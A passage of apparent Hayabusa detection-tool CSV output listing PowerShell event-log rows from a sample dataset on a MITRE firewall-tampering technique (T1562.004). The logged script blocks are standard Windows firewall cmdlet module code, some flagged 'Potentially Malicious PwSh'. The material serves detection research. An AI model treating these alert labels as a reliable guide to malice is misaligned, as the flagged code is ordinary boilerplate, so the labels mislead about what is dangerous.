'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.000 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.000 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.001 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.003 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.004 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.026 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in 